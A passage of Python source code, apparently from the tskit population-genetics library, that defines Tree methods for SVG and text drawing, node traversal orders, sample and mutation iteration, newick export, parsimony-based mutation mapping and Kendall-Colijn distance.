    arguments are forwarded to the underlying text-tree renderer.
    """
    orientation = drawing.check_orientation(orientation)
    # LEFT/RIGHT orientations use the horizontal renderer; TOP/BOTTOM
    # (and the default) use the vertical one.
    if orientation in (drawing.LEFT, drawing.RIGHT):
        renderer_class = drawing.HorizontalTextTree
    else:
        renderer_class = drawing.VerticalTextTree
    return str(renderer_class(self, orientation=orientation, **kwargs))
def draw_svg(
    self,
    path=None,
    *,
    size=None,
    tree_height_scale=None,
    max_tree_height=None,
    node_labels=None,
    mutation_labels=None,
    root_svg_attributes=None,
    style=None,
    order=None,
    force_root_branch=None,
    symbol_size=None,
    x_axis=None,
    x_label=None,
    y_axis=None,
    y_label=None,
    y_ticks=None,
    y_gridlines=None,
    all_edge_mutations=None,
    **kwargs,
):
    """
    Return an SVG representation of a single tree. Sample nodes are drawn as
    black squares, other nodes as black circles, and mutations as red crosses;
    these defaults can be changed via the ``style`` parameter. In a Jupyter
    notebook, wrap the result in ``IPython.display.SVG`` to show it inline.

    The generated SVG mirrors the structure of the tree: the whole drawing
    sits in a group of class ``tree`` (plus ``tN`` for tree index ``N``), and
    each node has a group of class ``nX`` nested inside its parent's group,
    containing its child groups, the edge above it, its symbol, and its label.
    Node groups also carry classes for the ancestor (``aX`` or ``root``),
    individual (``iX``) and population (``pX``) where defined, plus
    ``sample``/``leaf`` markers. These classes can be targetted with CSS to
    hide, colour or transform parts of the drawing (note that some styles,
    e.g. ``transform`` and geometry changes, need an SVG2-capable viewer).
    Because SVG styles apply to the whole embedding document, tag the drawing
    with a unique id via ``root_svg_attributes={'id': 'MY_UID'}`` and prefix
    selectors with ``#MY_UID`` when embedding multiple drawings in one page.

    :param str path: The path to the file to write the output. If None, do not
        write to file.
    :param size: A (width, height) tuple giving the drawing size in abstract
        user units (usually interpreted as pixels on initial display).
    :type size: tuple(int, int)
    :param str tree_height_scale: How node heights are computed: ``"time"``
        (default, proportional to node time), ``"log_time"`` (proportional to
        log(time)) or ``"rank"`` (equally spaced by ranked time).
    :param str,float max_tree_height: The maximum tree height in the current
        scaling system: ``"tree"`` (default, oldest root in this tree),
        ``"ts"`` (oldest root in the whole tree sequence, giving consistent
        heights across trees), or a numeric value used directly for scaling.
    :param node_labels: Custom labels for nodes by ID; nodes not present in
        the map get no label.
    :type node_labels: dict(int, str)
    :param mutation_labels: Custom labels for mutations by ID; mutations not
        present in the map get no label.
    :type mutation_labels: dict(int, str)
    :param dict root_svg_attributes: Additional attributes (e.g. an id) for
        the root ``<svg>`` tag of the generated drawing.
    :param str style: A css style string embedded in the ``<style>`` tag of
        the generated svg. Some styles require SVG2-compatible viewers.
    :param str order: The traversal type used to order the tips, as detailed
        in :meth:`Tree.nodes`; None (default) uses that method's default.
    :param bool force_root_branch: If ``True`` always draw a branch above the
        root(s); if ``None`` (default) only do so when a root has a mutation
        above it.
    :param float symbol_size: Size of node and mutation symbols; ``None``
        (default) uses a standard size.
    :param bool x_axis: Draw an X axis showing this tree's genomic extent;
        ``None`` (default) draws no X axis.
    :param str x_label: Label placed under the plot; if ``None`` (default)
        and there is an X axis, an appropriate label is generated.
    :param bool y_axis: Draw a Y axis showing time (or ranked time when
        ``tree_height_scale="rank"``); ``None`` (default) draws no Y axis.
    :param str y_label: Label placed left of the plot; if ``None`` (default)
        and there is a Y axis, an appropriate label is generated.
    :param list y_ticks: Y values at which to draw tickmarks (``[]`` for
        none); ``None`` draws one tickmark per unique node value.
    :param bool y_gridlines: Draw horizontal gridlines behind the tree at
        each y tickmark.
    :param bool all_edge_mutations: If ``True``, draw every mutation on each
        edge of this tree even when its site position lies outside the tree's
        genomic interval (such "extra" mutations get a different colour by
        default, and may be shared between drawings of adjacent trees). If
        ``False`` or ``None`` (default), only draw mutations whose position
        falls inside this tree's interval.
    :return: An SVG representation of a tree.
    :rtype: str
    """
    svg_tree = drawing.SvgTree(
        self,
        size,
        tree_height_scale=tree_height_scale,
        max_tree_height=max_tree_height,
        node_labels=node_labels,
        mutation_labels=mutation_labels,
        root_svg_attributes=root_svg_attributes,
        style=style,
        order=order,
        force_root_branch=force_root_branch,
        symbol_size=symbol_size,
        x_axis=x_axis,
        x_label=x_label,
        y_axis=y_axis,
        y_label=y_label,
        y_ticks=y_ticks,
        y_gridlines=y_gridlines,
        all_edge_mutations=all_edge_mutations,
        **kwargs,
    )
    rendered = svg_tree.drawing.tostring()
    if path is not None:
        # TODO: removed the pretty here when this is stable.
        svg_tree.drawing.saveas(path, pretty=True)
    return rendered
def draw(
    self,
    path=None,
    width=None,
    height=None,
    node_labels=None,
    node_colours=None,
    mutation_labels=None,
    mutation_colours=None,
    format=None,  # noqa A002
    edge_colours=None,
    tree_height_scale=None,
    max_tree_height=None,
    order=None,
):
    """
    Returns a drawing of this tree in SVG, ASCII or unicode format.

    In a Jupyter notebook, wrap the SVG result in ``IPython.display.SVG``
    to show it inline. The unicode format uses box drawing characters, so
    rendered trees can be printed to the terminal, e.g.
    ``print(tree.draw(format="unicode"))``. Note that in some notebook
    environments unicode box drawings may be misaligned; prefer SVG or
    ASCII there. The :meth:`Tree.draw_svg` method provides more
    comprehensive SVG functionality.

    :param str path: The path to the file to write the output. If None, do
        not write to file.
    :param int width: The image width in pixels; defaults to the minimum
        size required (text formats) or 200 pixels (SVG).
    :param int height: The image height in pixels; defaults to the minimum
        size required (text formats) or 200 pixels (SVG).
    :param dict node_labels: Custom labels for nodes by ID; nodes not in
        the map get no label (pass ``{}`` for no labels at all).
    :param dict node_colours: Custom colours for nodes by ID; nodes not in
        the map take the default colour, and ``None`` values suppress the
        node symbol. (SVG format only.)
    :param dict mutation_labels: Custom labels for mutations by ID;
        mutations not in the map get no label. (Mutations are currently
        only shown in the SVG format.)
    :param dict mutation_colours: Custom colours for mutations by ID;
        semantics as for ``node_colours``. (SVG format only.)
    :param str format: The output format: 'svg', 'ascii' or 'unicode'.
    :param dict edge_colours: Custom colours for the edge above each node
        by ID; semantics as for ``node_colours``. (SVG format only.)
    :param str tree_height_scale: How node heights are computed: ``"time"``
        (proportional to node time), ``"log_time"`` (proportional to
        log(time)) or ``"rank"`` (equally spaced by ranked time). SVG
        output defaults to 'time', text output to 'rank'; time scaling is
        not currently supported for text output.
    :param str,float max_tree_height: The maximum tree height in the
        current scaling system: ``"tree"`` (oldest root in this tree),
        ``"ts"`` (oldest root in the tree sequence, giving consistent
        heights across trees), or a numeric value used directly. Not
        currently supported for text output.
    :param str order: The left-to-right ordering of child nodes:
        ``"minlex"`` (default, minimises differences between adjacent
        trees; see the ``"minlex_postorder"`` traversal of :meth:`.nodes`)
        or ``"tree"`` (the order defined by the
        :ref:`quintuply linked tree structure <sec_data_model_tree_structure>`).
    :return: A representation of this tree in the requested format.
    :rtype: str
    """
    rendered = drawing.draw_tree(
        self,
        format=format,
        width=width,
        height=height,
        node_labels=node_labels,
        node_colours=node_colours,
        mutation_labels=mutation_labels,
        mutation_colours=mutation_colours,
        edge_colours=edge_colours,
        tree_height_scale=tree_height_scale,
        max_tree_height=max_tree_height,
        order=order,
    )
    if path is not None:
        with open(path, "w") as f:
            f.write(rendered)
    return rendered
def get_num_mutations(self):
    # Deprecated alias for self.num_mutations
    return self.num_mutations
@property
def num_mutations(self):
    """
    Returns the total number of mutations across all sites on this tree.

    :return: The total number of mutations over all sites on this tree.
    :rtype: int
    """
    # Accumulate the per-site mutation counts over every site on the tree.
    total = 0
    for site in self.sites():
        total += len(site.mutations)
    return total
@property
def num_sites(self):
    """
    Returns the number of sites on this tree.

    :return: The number of sites on this tree.
    :rtype: int
    """
    return self._ll_tree.get_num_sites()
def sites(self):
    """
    Returns an iterator over all the :ref:`sites <sec_site_table_definition>`
    in this tree. Sites are returned in order of increasing ID
    (and also position). See the :class:`Site` class for details on
    the available fields for each site.

    :return: An iterator over all sites in this tree.
    """
    # TODO change the low-level API to just return the IDs of the sites.
    # The low-level site tuples carry the site ID at index 3; resolve each
    # ID to a full Site object via the parent tree sequence.
    for ll_site in self._ll_tree.get_sites():
        yield self.tree_sequence.site(ll_site[3])
def mutations(self):
    """
    Returns an iterator over all the
    :ref:`mutations <sec_mutation_table_definition>` in this tree.
    Mutations are returned in their
    :ref:`order in the mutations table<sec_mutation_requirements>`,
    that is, by nondecreasing site ID, and within a site, by decreasing
    mutation time with parent mutations before their children.
    See the :class:`Mutation` class for details on the available fields for
    each mutation.

    The returned iterator is equivalent to iterating over all sites
    and all mutations in each site, i.e.::

        >>> for site in tree.sites():
        >>>     for mutation in site.mutations:
        >>>         yield mutation

    :return: An iterator over all :class:`Mutation` objects in this tree.
    :rtype: iter(:class:`Mutation`)
    """
    # Flatten the per-site mutation lists, preserving site order.
    for site in self.sites():
        for mutation in site.mutations:
            yield mutation
def get_leaves(self, u):
    # Deprecated alias for samples. See the discussion in the get_num_leaves
    # method for why this method is here and why it is semantically incorrect.
    # The 'leaves' iterator below correctly returns the leaves below a given
    # node.
    return self.samples(u)
def leaves(self, u=None):
    """
    Returns an iterator over all the leaves in this tree that are
    underneath the specified node. If u is not specified, return all leaves
    in the tree.

    :param int u: The node of interest.
    :return: An iterator over all leaves in the subtree rooted at u.
    :rtype: collections.abc.Iterable
    """
    # With no focal node, iterate over every root's subtree.
    search_roots = self.roots if u is None else [u]
    for root in search_roots:
        for node in self.nodes(root):
            if self.is_leaf(node):
                yield node
def _sample_generator(self, u):
    # Yield the sample node IDs in the subtree rooted at u.
    if self._ll_tree.get_options() & _tskit.SAMPLE_LISTS:
        # Fast path: the tree was built with sample lists, so walk the
        # linked list of sample indices from left_sample(u) to
        # right_sample(u) inclusive. The indices refer to positions in
        # the tree sequence's samples() array.
        samples = self.tree_sequence.samples()
        index = self.left_sample(u)
        if index != NULL:
            stop = self.right_sample(u)
            while True:
                yield samples[index]
                # stop is inclusive, so test before advancing.
                if index == stop:
                    break
                index = self.next_sample(index)
    else:
        # Fall back on iterating over all nodes in the tree, yielding
        # samples as we see them.
        for v in self.nodes(u):
            if self.is_sample(v):
                yield v
def samples(self, u=None):
    """
    Returns an iterator over the numerical IDs of all the sample nodes in
    this tree that are underneath node ``u``. If ``u`` is a sample, it is
    included in the returned iterator. If u is not specified, return all
    sample node IDs in the tree.

    If the :meth:`TreeSequence.trees` method is called with
    ``sample_lists=True``, this method uses an efficient algorithm to find
    the sample nodes. If not, a simple traversal based method is used.

    .. note::
        The iterator is *not* guaranteed to return the sample node IDs in
        numerical or any other particular order.

    :param int u: The node of interest.
    :return: An iterator over all sample node IDs in the subtree rooted at u.
    :rtype: collections.abc.Iterable
    """
    # With no focal node, chain the sample generators of every root.
    search_roots = self.roots if u is None else [u]
    for root in search_roots:
        yield from self._sample_generator(root)
def num_children(self, u):
    """
    Returns the number of children of the specified
    node (i.e. ``len(tree.children(u))``)

    :param int u: The node of interest.
    :return: The number of immediate children of the node u in this tree.
    :rtype: int
    """
    return self._ll_tree.get_num_children(u)
def get_num_leaves(self, u):
    # Deprecated alias for num_samples. The method name is inaccurate
    # as this will count the number of tracked _samples_. This is only provided to
    # avoid breaking existing code and should not be used in new code. We could
    # change this method to be semantically correct and just count the
    # number of leaves we hit in the leaves() iterator. However, this would
    # have the undesirable effect of making code that depends on the constant
    # time performance of get_num_leaves many times slower. So, the best option
    # is to leave this method as is, and to slowly deprecate it out. Once this
    # has been removed, we might add in a ``num_leaves`` method that returns the
    # length of the leaves() iterator as one would expect.
    return self.num_samples(u)
def get_num_samples(self, u=None):
    # Deprecated alias for num_samples.
    return self.num_samples(u)
def num_samples(self, u=None):
    """
    Returns the number of samples in this tree underneath the specified
    node, counting the node itself if it is a sample. When ``u`` is omitted,
    the total number of samples in the tree is returned.

    This is a constant time operation.

    :param int u: The node of interest.
    :return: The number of samples in the subtree rooted at u.
    :rtype: int
    """
    if u is not None:
        return self._ll_tree.get_num_samples(u)
    # Whole-tree count: sum the per-root counts maintained by the C library.
    return sum(self._ll_tree.get_num_samples(root) for root in self.roots)
def get_num_tracked_leaves(self, u):
    """Deprecated alias for :meth:`.num_tracked_samples`. Do not use in new code."""
    # The method name is inaccurate as this will count the number of tracked
    # _samples_. This is only provided to avoid breaking existing code.
    return self.num_tracked_samples(u)
def get_num_tracked_samples(self, u=None):
    """Deprecated alias for :meth:`.num_tracked_samples`. Do not use in new code."""
    return self.num_tracked_samples(u)
def num_tracked_samples(self, u=None):
    """
    Returns how many of the samples passed in the ``tracked_samples``
    parameter of :meth:`TreeSequence.trees` lie underneath the specified
    node. When ``u`` is omitted, the total count of tracked samples in the
    whole tree is returned.

    This is a constant time operation.

    :param int u: The node of interest.
    :return: The number of samples within the set of tracked samples in
        the subtree rooted at u.
    :rtype: int
    """
    focal_nodes = self.roots if u is None else [u]
    return sum(
        self._ll_tree.get_num_tracked_samples(node) for node in focal_nodes
    )
def _preorder_traversal(self, u):
    """Yield node IDs under ``u`` in preorder (node before its children)."""
    todo = collections.deque([u])
    # Bind frequently-used callables to locals; attribute lookups inside
    # the loop are a measurable cost for large trees.
    pop_node = todo.pop
    push_nodes = todo.extend
    children_of = self.children
    # "while todo" is marginally faster than an explicit length test.
    while todo:
        node = pop_node()
        # Reversing means the leftmost child is popped (and yielded) first.
        push_nodes(reversed(children_of(node)))
        yield node
def _postorder_traversal(self, u):
    """Yield node IDs under ``u`` in postorder (children before the node)."""
    pending = collections.deque([u])
    last_parent = NULL
    # Bind hot callables to locals to avoid repeated attribute lookups.
    pop_node = pending.pop
    push_nodes = pending.extend
    children_of = self.children
    parent_of = self.get_parent
    # "while pending" is marginally faster than an explicit length test.
    while pending:
        node = pending[-1]
        # If we have just finished this node's subtree (it is the parent of
        # the previously yielded node) we must not expand it again.
        kids = [] if node == last_parent else children_of(node)
        if kids:
            push_nodes(reversed(kids))
        else:
            last_parent = parent_of(node)
            yield pop_node()
def _inorder_traversal(self, u):
    """
    Yield node IDs under ``u`` in inorder: first half of the children,
    then the node itself, then the remaining children.
    """
    # TODO add a nonrecursive version of the inorder traversal.
    kids = self.get_children(u)
    split = len(kids) // 2
    for child in kids[:split]:
        yield from self._inorder_traversal(child)
    yield u
    for child in kids[split:]:
        yield from self._inorder_traversal(child)
def _levelorder_traversal(self, u):
    """Yield node IDs under ``u`` breadth-first, by increasing depth."""
    frontier = collections.deque([u])
    # Bind hot callables to locals; lookups inside the loop are costly.
    next_node = frontier.popleft
    enqueue = frontier.extend
    children_of = self.children
    # "while frontier" is marginally faster than testing the length.
    while frontier:
        node = next_node()
        enqueue(children_of(node))
        yield node
def _timeasc_traversal(self, u):
    """
    Yield nodes by increasing time, breaking ties by increasing node ID.
    """
    ordered = sorted(
        self.nodes(u, order="levelorder"),
        key=lambda node: (self.time(node), node),
    )
    yield from ordered
def _timedesc_traversal(self, u):
    """
    Yield nodes by decreasing time, breaking ties by decreasing node ID.
    """
    ordered = sorted(
        self.nodes(u, order="levelorder"),
        key=lambda node: (self.time(node), node),
        reverse=True,
    )
    yield from ordered
def _minlex_postorder_traversal(self, u):
    """
    Postorder traversal that visits leaves in minimum lexicographic order.
    Minlex stands for minimum lexicographic. We wish to visit a tree in such
    a way that the leaves visited, when their IDs are listed out, have
    minimum lexicographic order. This is a useful ordering for drawing
    multiple Trees of a TreeSequence, as it leads to more consistency
    between adjacent Trees.
    """
    # We skip perf optimisations here (compared to _preorder_traversal and
    # _postorder_traversal) as this ordering is unlikely to be used in perf
    # sensitive applications
    stack = collections.deque([u])
    # `parent` tracks the node whose subtree we have just finished, so that
    # revisiting it on the stack is distinguishable from the first visit.
    parent = NULL
    # Pass 1: a plain postorder that computes, for every node, the minimum
    # leaf ID in its subtree (min_leaf_dict). Pass 2 uses this to order
    # siblings.
    min_leaf_dict = {}
    while len(stack) > 0:
        v = stack[-1]
        children = [] if v == parent else self.children(v)
        if children:
            # The first time visiting a node, we push its children onto the stack.
            # reversed is not strictly necessary, but it gives the postorder
            # we would intuitively expect.
            stack.extend(reversed(children))
        else:
            # The second time visiting a node, we record its min leaf ID
            # underneath, pop it, and update the parent variable
            if v != parent:
                # at a leaf node
                min_leaf_dict[v] = v
            else:
                # at a parent after finishing all its children
                min_leaf_dict[v] = min([min_leaf_dict[c] for c in self.children(v)])
            parent = self.get_parent(v)
            stack.pop()
    # Now we do a second postorder traversal
    stack.clear()
    stack.extend([u])
    parent = NULL
    while len(stack) > 0:
        v = stack[-1]
        children = [] if v == parent else self.children(v)
        if children:
            # The first time visiting a node, we push onto the stack its children
            # in order of reverse min leaf ID under each child. This guarantees
            # that the earlier children visited have smaller min leaf ID,
            # which is equivalent to the minlex condition.
            stack.extend(
                sorted(children, key=lambda u: min_leaf_dict[u], reverse=True)
            )
        else:
            # The second time visiting a node, we pop and yield it, and
            # we update the parent variable
            parent = self.get_parent(v)
            yield stack.pop()
def nodes(self, root=None, order="preorder"):
    """
    Returns an iterator over the node IDs reachable from the root(s) in this tree.
    See :meth:`Tree.roots` for which nodes are considered roots. If the root
    parameter is provided, only the subtree rooted at this single root node
    will be iterated over. If this parameter is None, iterate over the node IDs in
    the subtrees rooted at each root node in turn. If the order parameter is
    provided, iterate over the nodes in each subtree in the specified tree traversal
    order.

    .. note::
        Unlike the :meth:`TreeSequence.nodes` method, this iterator produces
        integer node IDs, not :class:`Node` objects.

    The currently implemented traversal orders are:
        - 'preorder': starting at root, yield the current node, then recurse
          and do a preorder on each child of the current node. See also `Wikipedia
          <https://en.wikipedia.org/wiki/Tree_traversal#Pre-order_(NLR)>`__.
        - 'inorder': starting at root, assuming binary trees, recurse and do
          an inorder on the first child, then yield the current node, then
          recurse and do an inorder on the second child. In the case of ``n``
          child nodes (not necessarily 2), the first ``n // 2`` children are
          visited in the first stage, and the remaining ``n - n // 2`` children
          are visited in the second stage. See also `Wikipedia
          <https://en.wikipedia.org/wiki/Tree_traversal#In-order_(LNR)>`__.
        - 'postorder': starting at root, recurse and do a postorder on each
          child of the current node, then yield the current node. See also
          `Wikipedia
          <https://en.wikipedia.org/wiki/Tree_traversal#Post-order_(LRN)>`__.
        - 'levelorder' ('breadthfirst'): visit the nodes under root (including
          the root) in increasing order of their depth from root. See also
          `Wikipedia
          <https://en.wikipedia.org/wiki/Tree_traversal\
#Breadth-first_search_/_level_order>`__.
        - 'timeasc': visits the nodes in order of increasing time, falling back to
          increasing ID if times are equal.
        - 'timedesc': visits the nodes in order of decreasing time, falling back to
          decreasing ID if times are equal.
        - 'minlex_postorder': a usual postorder has ambiguity in the order in
          which children of a node are visited. We constrain this by outputting
          a postorder such that the leaves visited, when their IDs are
          listed out, have minimum `lexicographic order
          <https://en.wikipedia.org/wiki/Lexicographical_order>`__ out of all valid
          traversals. This traversal is useful for drawing multiple trees of
          a ``TreeSequence``, as it leads to more consistency between adjacent
          trees. Note that internal non-leaf nodes are not counted in
          assessing the lexicographic order.

    :param int root: The root of the subtree we are traversing.
    :param str order: The traversal ordering. Currently 'preorder',
        'inorder', 'postorder', 'levelorder' ('breadthfirst'), 'timeasc' and
        'timedesc' and 'minlex_postorder' are supported.
    :return: An iterator over the node IDs in the tree in some traversal order.
    :rtype: collections.abc.Iterable, int
    """
    # Dispatch table mapping order names to the generator implementations.
    methods = {
        "preorder": self._preorder_traversal,
        "inorder": self._inorder_traversal,
        "postorder": self._postorder_traversal,
        "levelorder": self._levelorder_traversal,
        "breadthfirst": self._levelorder_traversal,
        "timeasc": self._timeasc_traversal,
        "timedesc": self._timedesc_traversal,
        "minlex_postorder": self._minlex_postorder_traversal,
    }
    try:
        iterator = methods[order]
    except KeyError:
        # "from None" suppresses the uninformative KeyError chain: the
        # caller only needs to know the ordering name was invalid.
        raise ValueError(f"Traversal ordering '{order}' not supported") from None
    roots = [root]
    if root is None:
        roots = self.roots
    if order == "minlex_postorder" and len(roots) > 1:
        # we need to visit the roots in minlex order as well
        # we first visit all the roots and then sort by the min value
        root_values = []
        for u in roots:
            root_minlex_postorder = list(iterator(u))
            # In a minlex postorder the first node yielded is the minimum
            # leaf ID of the subtree, so it serves as the sort key.
            min_value = root_minlex_postorder[0]
            root_values.append([min_value, root_minlex_postorder])
        root_values.sort()
        for _, nodes_for_root in root_values:
            yield from nodes_for_root
    else:
        for u in roots:
            yield from iterator(u)
def _node_edges(self):
    """
    Return a numpy array mapping the node IDs in this tree to the ID of the edge
    above them. This is in lieu of a tree.edge(u) function, currently implemented
    using the non-optimised Python TreeSequence._tree_node_edges() generator
    """
    # The generator yields one node->edge map per tree in the sequence;
    # advance it until it reaches this tree's position.
    for index, node_edge_map in enumerate(  # pragma: no branch
        self.tree_sequence._tree_node_edges()
    ):
        if index == self.index:
            return node_edge_map
# TODO replace this recursive implementation with an iterative one.
def __build_newick(self, *, node, precision, node_labels, include_branch_lengths):
    """
    Recursively render the subtree below ``node`` as a newick fragment.
    Used instead of the C implementation when custom node labels are
    supplied or when branch lengths are to be omitted.
    """
    label = node_labels.get(node, "")
    if self.is_leaf(node):
        return f"{label}"
    fragments = []
    for child in self.children(node):
        fragment = self.__build_newick(
            node=child,
            precision=precision,
            node_labels=node_labels,
            include_branch_lengths=include_branch_lengths,
        )
        if include_branch_lengths:
            # Branch lengths are rendered with the requested fixed precision.
            fragment += ":{0:.{1}f}".format(self.branch_length(child), precision)
        fragments.append(fragment)
    return "(" + ",".join(fragments) + f"){label}"
def newick(
    self,
    precision=14,  # Should probably be keyword only, left positional for legacy use
    *,
    root=None,
    node_labels=None,
    include_branch_lengths=True,
):
    """
    Returns a `newick encoding <https://en.wikipedia.org/wiki/Newick_format>`_
    of this tree. If the ``root`` argument is specified, return a representation
    of the specified subtree, otherwise the full tree is returned. If the tree
    has multiple roots then separate newick strings for each rooted subtree
    must be found (i.e., we do not attempt to concatenate the different trees).

    By default, leaf nodes are labelled with their numerical ID + 1,
    and internal nodes are not labelled. Arbitrary node labels can be specified
    using the ``node_labels`` argument, which maps node IDs to the desired
    labels.

    .. warning:: Node labels are **not** Newick escaped, so care must be taken
        to provide labels that will not break the encoding.

    :param int precision: The numerical precision with which branch lengths are
        printed.
    :param int root: If specified, return the tree rooted at this node.
    :param dict node_labels: If specified, show custom labels for the nodes
        that are present in the map. Any nodes not specified in the map will
        not have a node label.
    :param include_branch_lengths: If True (default), output branch lengths in the
        Newick string. If False, only output the topology, without branch lengths.
    :return: A newick representation of this tree.
    :rtype: str
    """
    if root is None:
        if not self.has_single_root:
            raise ValueError(
                "Cannot get newick unless a tree has a single root. Try "
                "[t.newick(root) for root in t.roots] to get a list of "
                "newick trees, one for each root."
            )
        root = self.root
    if not include_branch_lengths and node_labels is None:
        # C code always puts branch lengths: force Py code by setting default labels
        node_labels = {i: str(i + 1) for i in self.leaves()}
    if node_labels is None:
        # Fast path: the C library renders the string into a preallocated
        # buffer, so we must compute an upper bound on the output size.
        root_time = max(1, self.time(root))
        max_label_size = math.ceil(math.log10(self.tree_sequence.num_nodes))
        # Per-node worst case: punctuation + label digits + time digits +
        # the requested number of digits after the decimal point.
        single_node_size = (
            4 + max_label_size + math.ceil(math.log10(root_time)) + precision
        )
        buffer_size = 1 + single_node_size * self.num_nodes
        s = self._ll_tree.get_newick(
            precision=precision, root=root, buffer_size=buffer_size
        )
        s = s.decode()
    else:
        # Slow path: pure-Python recursive builder supporting custom labels
        # and omitted branch lengths.
        s = (
            self.__build_newick(
                node=root,
                precision=precision,
                node_labels=node_labels,
                include_branch_lengths=include_branch_lengths,
            )
            + ";"
        )
    return s
def as_dict_of_dicts(self):
    """
    Convert tree to dict of dicts for conversion to a
    `networkx graph <https://networkx.github.io/documentation/stable/
    reference/classes/digraph.html>`_.

    For example::

        >>> import networkx as nx
        >>> nx.DiGraph(tree.as_dict_of_dicts())
        >>> # undirected graphs work as well
        >>> nx.Graph(tree.as_dict_of_dicts())

    :return: Dictionary of dictionaries of dictionaries where the first key
        is the source, the second key is the target of an edge, and the
        third key is an edge annotation. At this point the only annotation
        is "branch_length", the length of the branch (in units of time).
    """
    # Outer key: parent node; inner key: child node; innermost dict holds
    # the edge annotations expected by networkx.
    return {
        parent: {
            child: {"branch_length": self.branch_length(child)}
            for child in self.children(parent)
        }
        for parent in self.nodes()
    }
@property
def parent_dict(self):
    """Property alias for :meth:`.get_parent_dict`."""
    return self.get_parent_dict()
def get_parent_dict(self):
    """
    Return a dict mapping each node ID with a parent in this tree to that
    parent's ID. Nodes whose parent is ``NULL`` are omitted.
    """
    mapping = {}
    for node in range(self.num_nodes):
        parent = self.parent(node)
        if parent != NULL:
            mapping[node] = parent
    return mapping
def __str__(self):
    """Return a plain-text summary table describing this tree."""
    interval_text = (
        f"{self.interval.left:.8g}-{self.interval.right:.8g} ({self.span:.8g})"
    )
    summary = [
        ("Index", str(self.index)),
        ("Interval", interval_text),
        ("Roots", str(self.num_roots)),
        ("Nodes", str(self.num_nodes)),
        ("Sites", str(self.num_sites)),
        ("Mutations", str(self.num_mutations)),
        ("Total Branch Length", f"{self.total_branch_length:.8g}"),
    ]
    return util.unicode_table([[k, v] for k, v in summary], title="Tree")
def _repr_html_(self):
    """
    Called by jupyter notebooks to render tables
    """
    # Delegates HTML generation to the shared util helper.
    return util.tree_html(self)
def map_mutations(self, genotypes, alleles):
    """
    Given observations for the samples in this tree described by the
    ``genotypes`` array and ``alleles`` list, return a parsimonious set of
    state transitions explaining them. Each entry of ``genotypes`` is an
    index into ``alleles``, interpreted exactly as in
    :meth:`TreeSequence.variants`: sample ``j`` carrying allele index ``k``
    means ``genotypes[j] = k``.

    A sample's observation can be marked missing with ``tskit.MISSING_DATA``
    (-1), in which case it does not influence the inferred ancestral state
    or mutation placement. At least one non-missing observation is required,
    and at most 64 alleles are supported.

    The implementation uses the Hartigan parsimony algorithm to minimise
    the number of state transitions, with all transitions between
    non-missing states considered equally likely.

    The result is a two-tuple ``(ancestral_state, mutations)`` matching the
    data model for sites and mutations (see :ref:`sec_site_table_definition`
    and :ref:`sec_mutation_table_definition`). ``ancestral_state`` is the
    allele assigned to the tree root(s); ``mutations`` is a list of
    :class:`Mutation` objects ordered as
    :ref:`required in a mutation table<sec_mutation_requirements>`. For each
    mutation, ``node`` is the node below the branch carrying the transition,
    ``derived_state`` is the new allele, and ``parent`` is the index in the
    returned list of the previous mutation on the path to root (or
    ``tskit.NULL`` if none). Other :class:`Mutation` attributes are
    undefined and should not be used.

    .. note::
        Observations marked missing need not correspond to nodes that are
        actually :ref:`isolated<sec_data_model_missing_data>` in the tree;
        mapping the returned mutations onto the tree imputes such
        observations to the most parsimonious state.

    See the :ref:`sec_tutorial_parsimony` tutorial section for examples.

    :param array_like genotypes: The input observations for the samples in this tree.
    :param tuple(str) alleles: The alleles for the specified ``genotypes``. Each
        positive value in the ``genotypes`` array is treated as an index into this
        list of alleles.
    :return: The inferred ancestral state and list of mutations on this tree
        that encode the specified observations.
    :rtype: (str, list(tskit.Mutation))
    """
    genotypes = util.safe_np_int_cast(genotypes, np.int8)
    if np.max(genotypes) >= 64:
        raise ValueError("A maximum of 64 states is supported")
    ancestral_index, transitions = self._ll_tree.map_mutations(genotypes)
    # The C layer works with integer allele indexes; translate them back
    # into the caller's string alleles.
    mutations = []
    for node, mut_parent, derived_index in transitions:
        mutations.append(
            Mutation(
                node=node,
                derived_state=alleles[derived_index],
                parent=mut_parent,
                metadata=self.tree_sequence.table_metadata_schemas.mutation.empty_value,
            )
        )
    return alleles[ancestral_index], mutations
def kc_distance(self, other, lambda_=0.0):
    """
    Returns the Kendall-Colijn distance between the specified pair of trees.
    The ``lambda_`` parameter determines the relative weight of topology
    vs branch lengths in calculating the distance. If ``lambda_`` is 0
    (the default) we only consider topology, and if it is 1 we only
    consider branch lengths. See `Kendall & Colijn (2016)
    <https://academic.oup.com/mbe/article/33/10/2735/2925548>`_ for details.

    The trees we are comparing to must have identical lists of sample
    nodes (i.e., the same IDs in the same order). The metric operates on
    samples, not leaves, so internal samples are treated identically to
    sample tips. Subtrees with no samples do not contribute to the metric.

    :param Tree other: The other tree to compare to.
    :param float lambda_: The KC metric lambda parameter determining the
        relative weight of topology and branch length.
    :return: The computed KC distance between this tree and other.
    :rtype: float
    """
    # The computation is implemented entirely in the C library.
    return self._ll_tree.get_kc_distance(other._ll_tree, lambda_)
def split_polytomies(
    self,
    *,
    epsilon=None,
    method=None,
    record_provenance=True,
    random_seed=None,
    **kwargs,
):
    """
    Return a new :class:`.Tree` where extra nodes and edges have been inserted
    so that any node ``u`` with greater than 2 children --- a multifurcation
    or "polytomy" --- is resolved into successive bifurcations. New nodes are
    inserted at times fractionally less than the time of node ``u``.
    Times are allocated to different levels of the tree, such that any newly
    inserted sibling nodes will have the same time.

    By default, the times of the newly generated children of a particular
    node are the minimum representable distance in floating point arithmetic
    from their parents (using the `nextafter
    <https://numpy.org/doc/stable/reference/generated/numpy.nextafter.html>`_
    function). Thus, the generated branches have the shortest possible nonzero
    length. A fixed branch length between inserted nodes and their parents
    can also be specified by using the ``epsilon`` parameter.

    .. note::
        A tree sequence :ref:`requires<sec_valid_tree_sequence_requirements>` that
        parents be older than children and that mutations are younger than the
        parent of the edge on which they lie. If a fixed ``epsilon`` is specified
        and is not small enough compared to the distance between a polytomy and
        its oldest child (or oldest child mutation) these requirements may not
        be met. In this case an error will be raised.

    If the ``method`` is ``"random"`` (currently the only option, and the default
    when no method is specified), then for a node with :math:`n` children, one
    of the :math:`(2n - 3)! / (2^{n - 2} (n - 2)!)` possible binary trees is
    chosen with equal probability.

    The returned :class:`.Tree` will have the same genomic span as this tree,
    and node IDs will be conserved (that is, node ``u`` in this tree will
    be the same node in the returned tree). The returned tree is derived from a
    tree sequence that contains only one non-degenerate tree, that is, where
    edges cover only the interval spanned by this tree.

    :param epsilon: If specified, the fixed branch length between inserted
        nodes and their parents. If None (the default), the minimal possible
        nonzero branch length is generated for each node.
    :param str method: The method used to break polytomies. Currently only "random"
